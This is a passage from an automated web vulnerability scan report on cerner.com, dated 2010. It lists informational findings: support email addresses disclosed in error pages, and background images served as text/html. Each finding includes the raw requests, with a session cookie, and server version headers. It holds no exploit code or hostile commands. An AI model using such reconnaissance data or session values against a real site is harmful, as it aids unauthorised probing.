GET /WebResource.axd HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:08 GMT Connection: close Content-Length: 12948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3C404 - File Not Found%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/WebResource.axd%3E"> ...[SNIP]... </a> at ClientCareCenter@cerner.com, <a href="/contactus/"> ...[SNIP]...
|
6.6. http://cerner.com/error.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/error.aspx |
Issue detail
The following email addresses were disclosed in the response:- ClientCareCenter@cerner.com
- clientcarecenter@cerner.com
Request
GET /error.aspx?err=404 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:19:28 GMT Content-Length: 12955 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3C404 - File Not Found%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/error.aspx?err=404%3E"> ...[SNIP]... </a> at ClientCareCenter@cerner.com, <a href="/contactus/"> ...[SNIP]...
|
6.7. http://cerner.com/include/js/lib/ddpng.js
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/include/js/lib/ddpng.js |
Issue detail
The following email address was disclosed in the response:
Request
GET /include/js/lib/ddpng.js HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: public Content-Length: 7019 Content-Type: text/javascript Last-Modified: Tue, 03 Aug 2010 20:24:32 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:04 GMT Connection: close
/** * DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>. * Author: Drew Diller * Email: drew.diller@gmail.com * URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/ * Version: 0.0.8a * Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license * * Example usage: * DD_belat ...[SNIP]...
|
6.8. http://cerner.com/workarea/csslib/ektronCss.ashx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/workarea/csslib/ektronCss.ashx |
Issue detail
The following email addresses were disclosed in the response:- ClientCareCenter@cerner.com
- clientcarecenter@cerner.com
Request
GET /workarea/csslib/ektronCss.ashx HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 11 Nov 2010 22:57:02 GMT Connection: close Content-Length: 12912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <a href="mailto:clientcarecenter@cerner.com?subject=Error%20on%20Cerner.com&body=Error message%3A%20%3CObject%20reference%20not%20set%20to%20an%20instance%20of%20an%20object.%3E%20occurred%20on%20page%3A%20%3Chttp://cerner.com/workarea/csslib/e ...[SNIP]... </a> at ClientCareCenter@cerner.com, <a href="/contactus/"> ...[SNIP]...
|
7. Content type incorrectly stated
previous
There are 12 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
7.1. http://cerner.com/assets/img/home-bgr-blue.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-blue.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-blue.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:08:54 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.2. http://cerner.com/assets/img/home-bgr-green.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-green.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-green.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:17 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.3. http://cerner.com/assets/img/home-bgr-horz-blue.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-horz-blue.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-horz-blue.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:37 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.4. http://cerner.com/assets/img/home-bgr-horz-brown.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-horz-brown.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-horz-brown.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:38 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.5. http://cerner.com/assets/img/home-bgr-horz-green.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-horz-green.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-horz-green.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:39 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.6. http://cerner.com/assets/img/home-bgr-horz-red.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-horz-red.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-horz-red.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:52 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.7. http://cerner.com/assets/img/home-bgr-horz-teal.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-horz-teal.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-horz-teal.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:44 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.8. http://cerner.com/assets/img/home-bgr-horz-yellow.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-horz-yellow.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-horz-yellow.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:51 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.9. http://cerner.com/assets/img/home-bgr-red.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-red.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-red.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:18 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.10. http://cerner.com/assets/img/home-bgr-teal.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-teal.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-teal.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:20 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.11. http://cerner.com/assets/img/home-bgr-yellow.jpg
previous
next
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr-yellow.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr-yellow.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:34 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
7.12. http://cerner.com/assets/img/home-bgr.jpg
previous
Summary
Severity: |
Information |
Confidence: |
Firm |
Host: |
http://cerner.com |
Path: |
/assets/img/home-bgr.jpg |
Issue detail
The response contains the following Content-type statement:- Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /assets/img/home-bgr.jpg HTTP/1.1 Accept: */* Referer: http://cerner.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: cerner.com Proxy-Connection: Keep-Alive Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:09:13 GMT Content-Length: 109
<br><b>Error: </b>If you are running in load balanced environment your document will be available shortly<br> |
Report generated by Hoyt LLC Research
at Fri Nov 12 07:37:04 EST 2010.